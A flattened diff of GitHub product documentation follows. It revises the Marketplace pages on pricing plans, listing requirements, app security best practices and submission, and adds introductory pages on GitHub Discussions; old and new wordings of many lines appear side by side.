up a free pricing plan, you cannot charge users that choose the free pricing plan for the use of your app. You can create both free and paid plans for your listing. Unverified free apps do not need to implement any billing flows. Free apps that are verified by Github need to implement billing flows for new purchases and cancellations, but do not need to implement billing flows for free trials, upgrades, and downgrades. If you add a paid plan to an app that you've already listed in {% data variables.product.prodname_marketplace %} as a free service, you'll need to resubmit the app for review. There are two types of paid pricing plan: **Flat rate pricing plans** charge a set fee on a monthly and yearly basis. - Flat rate pricing plans charge a set fee on a monthly and yearly basis. **Per-unit pricing plans** charge a set fee on either a monthly or yearly basis for a unit that you specify. A "unit" can be anything you'd like (for example, a user, seat, or person). - Per-unit pricing plans charge a set fee on either a monthly or yearly basis for a unit that you specify. A "unit" can be anything you'd like (for example, a user, seat, or person). **Marketplace free trials** provide 14-day free trials of OAuth or GitHub Apps to customers. When you [set up a Marketplace pricing plan](/marketplace/listing-on-github-marketplace/setting-a-github-marketplace-listing-s-pricing-plan/), you can select the option to provide a free trial for flat-rate or per-unit pricing plans. You may also want to offer free trials. These provide free, 14-day trials of OAuth or GitHub Apps to customers. When you set up a Marketplace pricing plan, you can select the option to provide a free trial for flat-rate or per-unit pricing plans. ### Free trials Customers can start a free trial for any available paid plan on a Marketplace listing, but will not be able to create more than one free trial for a Marketplace product. Customers can start a free trial for any paid plan on a Marketplace listing that includes free trials. However, customers cannot create more than one free trial per marketplace product. Free trials have a fixed length of 14 days. Customers are notified 4 days before the end of their trial period (on day 11 of the free trial) that their plan will be upgraded. At the end of a free trial, customers will be auto-enrolled into the plan they are trialing if they do not cancel. See "[New purchases and free trials](/marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/)" for details on how to handle free trials in your app. For more information, see: "[Handling new purchases and free trials](/developers/github-marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/)." {% note %} 61 content/developers/github-marketplace/requirements-for-listing-an-app.md @@ -1,6 +1,6 @@ --- title: Requirements for listing an app intro: 'Apps on {% data variables.product.prodname_marketplace %} must meet the requirements outlined on this page before our {% data variables.product.prodname_marketplace %} onboarding specialists will approve the listing.' intro: 'Apps on {% data variables.product.prodname_marketplace %} must meet the requirements outlined on this page before the listing can be published.' redirect_from: - /apps/adding-integrations/listing-apps-on-github-marketplace/requirements-for-listing-an-app-on-github-marketplace/ - /apps/marketplace/listing-apps-on-github-marketplace/requirements-for-listing-an-app-on-github-marketplace/ @@ -12,49 +12,62 @@ versions: free-pro-team: '*' --- <!--UI-LINK: Displayed as a link on the https://github.com/marketplace/new page.--> The requirements for listing an app on {% data variables.product.prodname_marketplace %} vary according to whether you want to offer a free or a paid app. Before you submit your app for review, you must read and accept the terms of the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)." You'll accept the terms within your [draft listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/) on {% data variables.product.product_name %}. Once you've submitted your app, one of the {% data variables.product.prodname_marketplace %} onboarding specialists will reach out to you with more information about the onboarding process, and review your app to ensure it meets these requirements: ### Requirements for all {% data variables.product.prodname_marketplace %} listings ### User experience All listings on {% data variables.product.prodname_marketplace %} should be for tools that provide value to the {% data variables.product.product_name %} community. When you submit your listing for publication, you must read and accept the terms of the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)." - {% data variables.product.prodname_github_app %}s should have a minimum of 100 installations. - {% data variables.product.prodname_oauth_app %}s should have a minimum of 200 users. #### User experience requirements for all apps All listings should meet the following requirements, regardless of whether they are for a free or paid app. - Listings must not actively persuade users away from {% data variables.product.product_name %}. - Listings must include valid contact information for the publisher. - Listings must have a relevant description of the application. - Listings must specify a pricing plan. - Apps must provide value to customers and integrate with the platform in some way beyond authentication. - Apps must be publicly available in {% data variables.product.prodname_marketplace %} and cannot be in beta or available by invite only. - Apps cannot actively persuade users away from {% data variables.product.product_name %}. - Marketing materials for the app must accurately represent the app's behavior. - Apps must include links to user-facing documentation that describe how to set up and use the app. - When a customer purchases an app and GitHub redirects them to the app's installation URL, the app must begin the OAuth flow immediately. For details, see "[Handling new purchases and free trials](/marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/#step-3-authorization)." - Apps must have webhook events set up to notify the publisher of any plan changes or cancellations using the {% data variables.product.prodname_marketplace %} API. For more information, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." - Customers must be able to install your app and select repositories on both a personal and organization account. They should be able to view and manage those accounts separately. For more information on providing a good customer experience, see "[Customer experience best practices for apps](/developers/github-marketplace/customer-experience-best-practices-for-apps)." ### Brand and listing #### Brand and listing requirements for all apps - Apps that use GitHub logos must follow the "[{% data variables.product.product_name %} Logos and Usage](https://github.com/logos)" guidelines. - Apps that use GitHub logos must follow the {% data variables.product.company_short %} guidelines. For more information, see "[{% data variables.product.company_short %} Logos and Usage](https://github.com/logos)." - Apps must have a logo, feature card, and screenshots images that meet the recommendations provided in "[Writing {% data variables.product.prodname_marketplace %} listing descriptions](/marketplace/listing-on-github-marketplace/writing-github-marketplace-listing-descriptions/)." - Listings must include descriptions that are well written and free of grammatical errors. For guidance in writing your listing, see "[Writing {% data variables.product.prodname_marketplace %} listing descriptions](/marketplace/listing-on-github-marketplace/writing-github-marketplace-listing-descriptions/)." ### Security To protect your customers, we recommend that you also follow security best practices. For more information, see "[Security best practices for apps](/developers/github-marketplace/security-best-practices-for-apps)." ### Considerations for free apps Apps will go through a security review before being listed on {% data variables.product.prodname_marketplace %}. A successful review will meet the requirements and follow the security best practices listed in "[Security review process](/marketplace/getting-started/security-review-process/)." For information on the review process, contact [marketplace@github.com](mailto:marketplace@github.com). {% data reusables.marketplace.free-apps-encouraged %} ### Requirements for paid apps In addition to the requirements for all apps above, each app that you offer as a paid service on {% data variables.product.prodname_marketplace %} must also meet the following requirements: - {% data variables.product.prodname_github_app %}s should have a minimum of 100 installations. - {% data variables.product.prodname_oauth_app %}s should have a minimum of 200 users. - All paid apps must handle {% data variables.product.prodname_marketplace %} purchase events for new purchases, upgrades, downgrades, cancellations, and free trials. For more information, see "[Billing requirements for paid apps](#billing-requirements-for-paid-apps)" below. - Publishing organizations must have a verified domain and must enable two-factor authentication. For more information, see "[Requiring two-factor authentication in your organization](/github/setting-up-and-managing-organizations-and-teams/requiring-two-factor-authentication-in-your-organization.") ### Billing flows When you are ready to publish the app on {% data variables.product.prodname_marketplace %} you must request verification for the listing. Your app must integrate [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows) using the [{% data variables.product.prodname_marketplace %} webhook event](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/). {% note %} #### Free apps The verification process is open to organizations. {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication#transferring-an-app-to-an-organization-before-you-submit)." {% data reusables.marketplace.free-apps-encouraged %} If you are listing a free app, you'll need to meet these requirements: {% endnote %} - Customers must be able to see that they have a free plan in the billing, profile, or account settings section of the app. - When a customer cancels your app, you must follow the flow for [cancelling plans](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/). ### Billing requirements for paid apps #### Paid apps Your app does not need to handle payments but does need to use {% data variables.product.prodname_marketplace %} purchase events to manage new purchases, upgrades, downgrades, cancellations, and free trials. For information about how integrate these events into your app, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." To offer your app as a paid service, you'll need to meet these requirements to list your app on {% data variables.product.prodname_marketplace %}: Using GitHub's billing API allows customers to purchase an app without leaving GitHub and to pay for the service with the payment method already attached to their {% data variables.product.product_name %} account. - To sell your app in {% data variables.product.prodname_marketplace %}, it must use GitHub's billing system. Your app does not need to handle payments but does need to use "[{% data variables.product.prodname_marketplace %} purchase events](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/)" to manage new purchases, upgrades, downgrades, cancellations, and free trials. See "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)" to learn about how to integrate these events into your app. Using GitHub's billing system allows customers to purchase an app without leaving GitHub and pay for the service with the payment method already attached to their {% data variables.product.product_name %} account. - Apps must support both monthly and annual billing for paid subscriptions purchases. - Listings may offer any combination of free and paid plans. Free plans are optional but encouraged. For more information, see "[Setting a {% data variables.product.prodname_marketplace %} listing's pricing plan](/marketplace/listing-on-github-marketplace/setting-a-github-marketplace-listing-s-pricing-plan/)." {% data reusables.marketplace.marketplace-billing-ui-requirements %} 60 content/developers/github-marketplace/security-best-practices-for-apps.md @@ -0,0 +1,60 @@ --- title: Security best practices for apps intro: 'Guidelines for preparing a secure app to share on {% data variables.product.prodname_marketplace %}.' redirect_from: - /apps/marketplace/getting-started/security-review-process/ - /marketplace/getting-started/security-review-process - /developers/github-marketplace/security-review-process-for-submitted-apps shortTitle: Security best practice versions: free-pro-team: '*' --- If you follow these best practices it will help you to provide a secure user experience. ### Authorization, authentication, and access control We recommend creating a GitHub App rather than an OAuth App. {% data reusables.marketplace.github_apps_preferred %}. See "[Differences between GitHub Apps and OAuth Apps](/apps/differences-between-apps/)" for more details. - Apps should use the principle of least privilege and should only request the OAuth scopes and GitHub App permissions that the app needs to perform its intended functionality. For more information, see [Principle of least privilege](https://en.wikipedia.org/wiki/Principle_of_least_privilege) in Wikipedia. - Apps should provide customers with a way to delete their account, without having to email or call a support person. - Apps should not share tokens between different implementations of the app. For example, a desktop app should have a separate token from a web-based app. Individual tokens allow each app to request the access needed for GitHub resources separately. - Design your app with different user roles, depending on the functionality needed by each type of user. For example, a standard user should not have access to admin functionality, and billing managers might not need push access to repository code. - Apps should not share service accounts such as email or database services to manage your SaaS service. - All services used in your app should have unique login and password credentials. - Admin privilege access to the production hosting infrastructure should only be given to engineers and employees with administrative duties. - Apps should not use personal access tokens to authenticate and should authenticate as an [OAuth App](/apps/about-apps/#about-oauth-apps) or a [GitHub App](/apps/about-apps/#about-github-apps): - OAuth Apps should authenticate using an [OAuth token](/apps/building-oauth-apps/authorizing-oauth-apps/). - GitHub Apps should authenticate using either a [JSON Web Token (JWT)](/apps/building-github-apps/authenticating-with-github-apps/#authenticating-as-a-github-app), [OAuth token](/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps/), or [installation access token](/apps/building-github-apps/authenticating-with-github-apps/#authenticating-as-an-installation). ### Data protection - Apps should encrypt data transferred over the public internet using HTTPS, with a valid TLS certificate, or SSH for Git. - Apps should store client ID and client secret keys securely. We recommend storing them as [environmental variables](http://en.wikipedia.org/wiki/Environment_variable#Getting_and_setting_environment_variables). - Apps should delete all GitHub user data within 30 days of receiving a request from the user, or within 30 days of the end of the user's legal relationship with GitHub. - Apps should not require the user to provide their GitHub password. - Apps should encrypt tokens, client IDs, and client secrets. ### Logging and monitoring Apps should have logging and monitoring capabilities. App logs should be retained for at least 30 days and archived for at least one year. A security log should include: - Authentication and authorization events - Service configuration changes - Object reads and writes - All user and group permission changes - Elevation of role to admin - Consistent timestamping for each event - Source users, IP addresses, and/or hostnames for all logged actions ### Incident response workflow To provide a secure experience for users, you should have a clear incident response plan in place before listing your app. We recommend having a security and operations incident response team in your company rather than using a third-party vendor. You should have the capability to notify {% data variables.product.product_name %} within 24 hours of a confirmed incident. For an example of an incident response workflow, see the "Data Breach Response Policy" on the [SANS Institute website](https://www.sans.org/information-security-policy/). A short document with clear steps to take in the event of an incident is more valuable than a lengthy policy template. ### Vulnerability management and patching workflow You should conduct regular vulnerability scans of production infrastructure. You should triage the results of vulnerability scans and define a period of time in which you agree to remediate the vulnerability. If you are not ready to set up a full vulnerability management program, it's useful to start by creating a patching process. For guidance in creating a patch management policy, see this TechRepublic article "[Establish a patch management policy](https://www.techrepublic.com/blog/it-security/establish-a-patch-management-policy-87756/)." 94 ...ent/developers/github-marketplace/security-review-process-for-submitted-apps.md This file was deleted. 53 content/developers/github-marketplace/setting-pricing-plans-for-your-listing.md @@ -1,6 +1,6 @@ --- title: Setting pricing plans for your listing intro: 'When [listing your app on {% data variables.product.prodname_marketplace %}](/marketplace/listing-on-github-marketplace/), you can choose to provide your app as a free service or sell your app. If you plan to sell your app, you can create different pricing plans for different feature tiers.' intro: 'When you list your app on {% data variables.product.prodname_marketplace %}, you can choose to provide your app as a free service or sell your app. If you plan to sell your app, you can create different pricing plans for different feature tiers.' redirect_from: - /apps/adding-integrations/managing-pricing-and-payments-for-a-github-marketplace-listing/setting-a-github-marketplace-listing-s-pricing-plan/ - /apps/marketplace/managing-pricing-and-payments-for-a-github-marketplace-listing/setting-a-github-marketplace-listing-s-pricing-plan/ @@ -17,57 +17,52 @@ versions: free-pro-team: '*' --- ### About setting pricing plans If you want to sell an app on {% data variables.product.prodname_marketplace %}, you need to request verification when you publish the listing for your app. During the verification process, an onboarding expert checks the organization's identity and security settings. The onboarding expert will also take the organization through financial onboarding. For more information, see: "[Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/)." ### Creating pricing plans To learn about the types of pricing plans that {% data variables.product.prodname_marketplace %} offers, see "[{% data variables.product.prodname_marketplace %} Pricing Plans](/marketplace/selling-your-app/github-marketplace-pricing-plans/)." You'll also find helpful billing guidelines in "[Selling your app](/marketplace/selling-your-app/)." Pricing plans can be in the draft or published state. If you haven't submitted your {% data variables.product.prodname_marketplace %} listing for approval, a published listing will function the same way as draft listings until your app is approved and listed on {% data variables.product.prodname_marketplace %}. Draft listings allow you to create and save new pricing plans without making them available on your {% data variables.product.prodname_marketplace %} listing page. Once you publish the pricing plan, it's available for customers to purchase immediately. You can publish up to 10 pricing plans. {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication#transferring-an-app-to-an-organization-before-you-submit)." To create a pricing plan for your {% data variables.product.prodname_marketplace %} listing, click **Plans and pricing** in the left sidebar of your [{% data variables.product.prodname_marketplace %} listing page](https://github.com/marketplace/manage). If you haven't created a {% data variables.product.prodname_marketplace %} listing yet, read "[Creating a draft {% data variables.product.prodname_marketplace %} listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/)" to learn how. When you click **New draft plan**, you'll see a form that allows you to customize your pricing plan. You'll need to configure the following fields to create a pricing plan: {% data variables.product.prodname_marketplace %} offers several different types of pricing plan. For detailed information, see "[Pricing plans for {% data variables.product.prodname_marketplace %}](/developers/github-marketplace/pricing-plans-for-github-marketplace-apps)." #### Plan name ### About saving pricing plans Your pricing plan's name will appear on your {% data variables.product.prodname_marketplace %} app's landing page. You can customize the name of your pricing plan to align to the plan's resources, the size of the company that will use the plan, or anything you'd like. You can save pricing plans in a draft or published state. If you haven't submitted your {% data variables.product.prodname_marketplace %} listing for approval, a published plan will function in the same way as a draft plan until your listing is approved and shown on {% data variables.product.prodname_marketplace %}. Draft plans allow you to create and save new pricing plans without making them available on your {% data variables.product.prodname_marketplace %} listing page. Once you publish a pricing plan on a published listing, it's available for customers to purchase immediately. You can publish up to 10 pricing plans. #### Pricing models For guidelines on billing customers, see "[Billing customers](/developers/github-marketplace/billing-customers)." ##### Free plans {% data reusables.marketplace.free-apps-encouraged %} A free plan still requires you to handle [new purchase](/marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/) and [cancellation](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/) billing flows. See "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)" for more details. ##### Flat-rate plans ### Creating pricing plans Flat-rate pricing plans allow you to offer your service to customers for a flat-rate fee. {% data reusables.marketplace.marketplace-pricing-free-trials %} To create a pricing plan for your {% data variables.product.prodname_marketplace %} listing, click **Plans and pricing** in the left sidebar of your [{% data variables.product.prodname_marketplace %} listing page](https://github.com/marketplace/manage). For more information, see "[Creating a draft {% data variables.product.prodname_marketplace %} listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/)." You must set a price for both monthly and yearly subscriptions in U.S. Dollars for flat-rate plans. When you click **New draft plan**, you'll see a form that allows you to customize your pricing plan. You'll need to configure the following fields to create a pricing plan: ##### Per-unit plans - **Plan name** - Your pricing plan's name will appear on your {% data variables.product.prodname_marketplace %} app's landing page. You can customize the name of your pricing plan to align with the plan's resources, the size of the company that will use the plan, or anything you'd like. Per-unit pricing allows you to offer your app in units. For example, a unit can be a person, seat, or user. You'll need to provide a name for the unit and set a price for both monthly and yearly subscriptions, in U.S. Dollars. - **Pricing models** - There are three types of pricing plan: free, flat-rate, and per-unit. All plans require you to process new purchase and cancellation events from the marketplace API. In addition, for paid plans: #### Available for - You must set a price for both monthly and yearly subscriptions in US dollars. - Your app must process plan change events. - You must request verification to publish a listing with a paid plan. - {% data reusables.marketplace.marketplace-pricing-free-trials %} {% data variables.product.prodname_marketplace %} pricing plans can apply to **Personal and organization accounts**, **Personal accounts only**, or **Organization accounts only**. For example, if your pricing plan is per-unit and provides multiple seats, you would select **Organization accounts only** because there is no way to assign seats to people in an organization from a personal account. For detailed information, see "[Pricing plans for {% data variables.product.prodname_marketplace %} apps](/developers/github-marketplace/pricing-plans-for-github-marketplace-apps)" and "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." #### Short description - **Available for** - {% data variables.product.prodname_marketplace %} pricing plans can apply to **Personal and organization accounts**, **Personal accounts only**, or **Organization accounts only**. For example, if your pricing plan is per-unit and provides multiple seats, you would select **Organization accounts only** because there is no way to assign seats to people in an organization from a personal account. Write a brief summary of the details of the pricing plan. The description might include the type of customer the plan is intended for or the resources the plan includes. - **Short description** - Write a brief summary of the details of the pricing plan. The description might include the type of customer the plan is intended for or the resources the plan includes. #### Bullets - **Bullets** - You can write up to four bullets that include more details about your pricing plan. The bullets might include the use cases of your app or list more detailed information about the resources or features included in the plan. You can write up to four bullets that include more details about your pricing plan. The bullets might include the use cases of your app or list more detailed information about the resources or features included in the plan. {% data reusables.marketplace.free-plan-note %} ### Changing a {% data variables.product.prodname_marketplace %} listing's pricing plan If a pricing plan for your {% data variables.product.prodname_marketplace %} plan is no longer needed or if you need to adjust pricing details, you can remove it. If a pricing plan for your {% data variables.product.prodname_marketplace %} listing is no longer needed, or if you need to adjust pricing details, you can remove it.  Once you publish a pricing plan for an app already listed in the {% data variables.product.prodname_marketplace %}, you can't make changes to the plan. Instead, you'll need to remove the pricing plan. Customers who already purchased the removed pricing plan will continue to use it until they opt out and move onto a new pricing plan. For more on pricing plans, see "[{% data variables.product.prodname_marketplace %} pricing plans](/marketplace/selling-your-app/github-marketplace-pricing-plans/)." Once you publish a pricing plan for an app that is already listed in {% data variables.product.prodname_marketplace %}, you can't make changes to the plan. Instead, you'll need to remove the pricing plan and create a new plan. Customers who already purchased the removed pricing plan will continue to use it until they opt out and move onto a new pricing plan. For more on pricing plans, see "[{% data variables.product.prodname_marketplace %} pricing plans](/marketplace/selling-your-app/github-marketplace-pricing-plans/)." Once you remove a pricing plan, users won't be able to purchase your app using that plan. Existing users on the removed pricing plan will continue to stay on the plan until they cancel their plan subscription. 37 content/developers/github-marketplace/submitting-your-listing-for-publication.md @@ -0,0 +1,37 @@ --- title: Submitting your listing for publication intro: 'You can submit your listing for the {% data variables.product.prodname_dotcom %} community to use.' redirect_from: - /marketplace/listing-on-github-marketplace/submitting-your-listing-for-review - /developers/github-marketplace/submitting-your-listing-for-review versions: free-pro-team: '*' --- Once you've completed the listing for your app, you'll see two buttons that allow you to request publication of the listing with or without verification. The **Request** button for "Publish without verification" is disabled if you have published any paid pricing plans in the listing.  {% data reusables.marketplace.launch-with-free %} After you submit your listing for review, an onboarding expert will reach out to you with additional information. For an overview of the process for creating and submitting a listing, see "[About {% data variables.product.prodname_marketplace %}](/developers/github-marketplace/about-github-marketplace#publishing-an-app-to-github-marketplace)." ### Prerequisites for publishing with verification Before you request verification of your listing, you'll need to integrate the {% data variables.product.prodname_marketplace %} billing flows and webhook into your app. For more information, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." If you've met the requirements for listing and you've integrated with the {% data variables.product.prodname_marketplace %} API, go ahead and submit your listing. For more information, see "[Requirements for listing an app](/developers/github-marketplace/requirements-for-listing-an-app)." {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Transferring an app to an organization before you submit](#transferring-an-app-to-an-organization-before-you-submit)" below. ### Transferring an app to an organization before you submit You cannot sell an app that's owned by a user account. You need to transfer the app to an organization that is already a verified creator, or that can request verification for a listing for the app. For details, see: 1. "[Creating an organization from scratch](/github/setting-up-and-managing-organizations-and-teams/creating-a-new-organization-from-scratch)" 1. "[Transferring ownership of a GitHub App](/developers/apps/transferring-ownership-of-a-github-app)" or "[Transferring ownership of an OAuth App](/developers/apps/transferring-ownership-of-an-oauth-app)" 22 content/developers/github-marketplace/submitting-your-listing-for-review.md This file was deleted. 4 content/developers/github-marketplace/testing-your-app.md @@ -1,6 +1,6 @@ --- title: Testing your app intro: 'GitHub recommends testing your app with APIs and webhooks before submitting your listing to {% data variables.product.prodname_marketplace %} so you can provide an ideal experience for customers. Before the {% data variables.product.prodname_marketplace %} onboarding team approves your app, it must adequately handle the [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows).' intro: 'GitHub recommends testing your app with APIs and webhooks before submitting your listing to {% data variables.product.prodname_marketplace %} so you can provide an ideal experience for customers. Before an onboarding expert approves your app, it must adequately handle the billing flows.' redirect_from: - /apps/marketplace/testing-apps-apis-and-webhooks/ - /apps/marketplace/integrating-with-the-github-marketplace-api/testing-github-marketplace-apps/ @@ -13,7 +13,7 @@ versions: ### Testing apps You can use a [draft {% data variables.product.prodname_marketplace %} listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/) to simulate each of the [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows). A listing in the draft state means that it has not been submitted for approval. Any purchases you make using a draft {% data variables.product.prodname_marketplace %} listing will _not_ create real transactions, and GitHub will not charge your credit card. You can use a draft {% data variables.product.prodname_marketplace %} listing to simulate each of the billing flows. A listing in the draft state means that it has not been submitted for approval. Any purchases you make using a draft {% data variables.product.prodname_marketplace %} listing will _not_ create real transactions, and GitHub will not charge your credit card. For more information, see "[Drafting a listing for your app](/developers/github-marketplace/drafting-a-listing-for-your-app)" and "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." #### Using a development app with a draft listing to test changes 2 .../developers/github-marketplace/webhook-events-for-the-github-marketplace-api.md @@ -1,6 +1,6 @@ --- title: Webhook events for the GitHub Marketplace API intro: 'A {% data variables.product.prodname_marketplace %} app receives information about changes to a user''s plan from the Marketplace purchase event webhook. A Marketplace purchase event is triggered when a user purchases, cancels, or changes their payment plan. For details on how to respond to each of these types of events, see "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)."' intro: 'A {% data variables.product.prodname_marketplace %} app receives information about changes to a user''s plan from the Marketplace purchase event webhook. A Marketplace purchase event is triggered when a user purchases, cancels, or changes their payment plan.' redirect_from: - /apps/marketplace/setting-up-github-marketplace-webhooks/about-webhook-payloads-for-a-github-marketplace-listing/ - /apps/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/ 4 content/developers/webhooks-and-events/webhook-events-and-payloads.md @@ -445,7 +445,7 @@ Key | Type | Description #### Webhook payload object {% data reusables.webhooks.installation_properties %} {% data reusables.webhooks.app_desc %} {% data reusables.webhooks.app_always_desc %} {% data reusables.webhooks.sender_desc %} #### Webhook payload example @@ -469,7 +469,7 @@ Key | Type | Description #### Webhook payload object {% data reusables.webhooks.installation_repositories_properties %} {% data reusables.webhooks.app_desc %} {% data reusables.webhooks.app_always_desc %} {% data reusables.webhooks.sender_desc %} #### Webhook payload example 54 ...ssions/collaborating-with-your-community-using-discussions/about-discussions.md @@ -0,0 +1,54 @@ --- title: About discussions intro: Use discussions to ask and answer questions, share information, make announcements, and conduct or participate in a conversation about a project on {% data variables.product.product_name %}. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About discussions With {% data variables.product.prodname_discussions %}, the community for your project can create and participate in conversations within the project's repository. Discussions empower a project's maintainers, contributors, and visitors to gather and accomplish the following goals in a central location, without third-party tools. - Share announcements and information, gather feedback, plan, and make decisions - Ask questions, discuss and answer the questions, and mark the discussions as answered - Foster an inviting atmosphere for visitors and contributors to discuss goals, development, administration, and workflows  You don't need to close a discussion like you close an issue or a pull request. If a repository administrator or project maintainer enables discussions for a repository, anyone who visits the repository can create and participate in discussions for the repository. Repository administrators and project maintainers can manage discussions and discussion categories in a repository, and pin discussions to increase the visibility of the discussion. Moderators and collaborators can mark comments as answers, lock discussions, and convert issues to discussions. For more information, see "[Repository permission levels for an organization](/github/setting-up-and-managing-organizations-and-teams/repository-permission-levels-for-an-organization)." For more information about management of discussions for your repository, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository)." ### About categories and formats for discussions {% data reusables.discussions.you-can-categorize-discussions %} {% data reusables.discussions.about-categories-and-formats %} {% data reusables.discussions.repository-category-limit %} For discussions with a question/answer format, an individual comment within the discussion can be marked as the discussion's answer. {% data reusables.discussions.github-recognizes-members %} For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)." ### Best practices for discussions As a community member or maintainer, start a discussion to ask a question or discuss information that affects the community. For more information, see "[Collaborating with maintainers using discussions](/discussions/collaborating-with-your-community-using-discussions/collaborating-with-maintainers-using-discussions)." Participate in a discussion to ask and answer questions, provide feedback, and engage with the project's community. For more information, see "[Participating in a discussion](/discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion)." You can spotlight discussions that contain important, useful, or exemplary conversations among members in the community. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository#pinning-a-discussion)." {% data reusables.discussions.you-can-convert-an-issue %} For more information, see "[Moderating discussions in your repository](/discussions/managing-discussions-for-your-community/moderating-discussions#converting-an-issue-to-a-discussion)." ### Sharing feedback You can share your feedback about {% data variables.product.prodname_discussions %} with {% data variables.product.company_short %}. To join the conversation, see [`github/feedback`](https://github.com/github/feedback/discussions?discussions_q=category%3A%22Discussions+Feedback%22). ### Further reading - "[About writing and formatting on {% data variables.product.prodname_dotcom %}](/github/writing-on-github/about-writing-and-formatting-on-github)" - "[Searching discussions](/github/searching-for-information-on-github/searching-discussions)" - "[About notifications](/github/managing-subscriptions-and-notifications-on-github/about-notifications)" - "[Moderating comments and conversations](/github/building-a-strong-community/moderating-comments-and-conversations)" - "[Maintaining your safety on {% data variables.product.prodname_dotcom %}](/github/building-a-strong-community/maintaining-your-safety-on-github)" 50 ...community-using-discussions/collaborating-with-maintainers-using-discussions.md @@ -0,0 +1,50 @@ --- title: Collaborating with maintainers using discussions shortTitle: Collaborating with maintainers intro: You can contribute to the goals, plans, health, and community for a project on {% data variables.product.product_name %} by communicating with the maintainers of the project in a discussion. permissions: People with read permissions to a repository can start and participate in discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About collaboration with maintainers using discussions {% data reusables.discussions.about-discussions %} If you use or contribute to a project, you can start a discussion to make suggestions and engage with maintainers and community members about your plans, questions, ideas, and feedback. For more information, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)." {% data reusables.discussions.about-categories-and-formats %} Repository administrators and project maintainers can delete a discussion. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository#deleting-a-discussion)." {% data reusables.discussions.github-recognizes-members %} These members appear in a list of the most helpful contributors to the project's discussions. As your project grows, you can grant higher access permissions to active members of your community. For more information, see "[Granting higher permissions to top contributors](/discussions/guides/granting-higher-permissions-to-top-contributors)"  For more information about participation in discussions, see "[Participating in a discussion](/discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion)." ### Prerequisites To collaborate with maintainers using discussions, a repository administrator or project maintainer must enable discussions for the repository. For more information, see "[Enabling or disabling discussions for a repository](/github/administering-a-repository/enabling-or-disabling-github-discussions-for-a-repository)." ### Starting a discussion {% data reusables.discussions.starting-a-discussion %} ### Filtering the list of discussions You can search for discussions and filter the list of discussions in a repository. For more information, see "[Searching discussions](/github/searching-for-information-on-github/searching-discussions)." {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. In the **Search all discussions** field, type a search query. Optionally, to the right of the search field, click a button to further filter the results.  1. In the list of discussions, click the discussion you want to view.  ### Converting an issue to a discussion {% data reusables.discussions.you-can-convert-an-issue %} For more information, see "[Moderating discussions in your repository](/discussions/managing-discussions-for-your-community/moderating-discussions#converting-an-issue-to-a-discussion#converting-an-issue-to-a-discussion)." ### Further reading - "[About writing and formatting on {% data variables.product.prodname_dotcom %}](/github/writing-on-github/about-writing-and-formatting-on-github)" - "[Maintaining your safety on {% data variables.product.prodname_dotcom %}](/github/building-a-strong-community/maintaining-your-safety-on-github)" 14 content/discussions/collaborating-with-your-community-using-discussions/index.md @@ -0,0 +1,14 @@ --- title: Collaborating with your community using discussions shortTitle: Collaborating using discussions intro: Gather and discuss your project with community members and other maintainers. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} {% link_in_list /about-discussions %} {% link_in_list /participating-in-a-discussion %} {% link_in_list /collaborating-with-maintainers-using-discussions %} 31 ...borating-with-your-community-using-discussions/participating-in-a-discussion.md @@ -0,0 +1,31 @@ --- title: Participating in a discussion intro: You can converse with the community and maintainers in a forum within the repository for a project on {% data 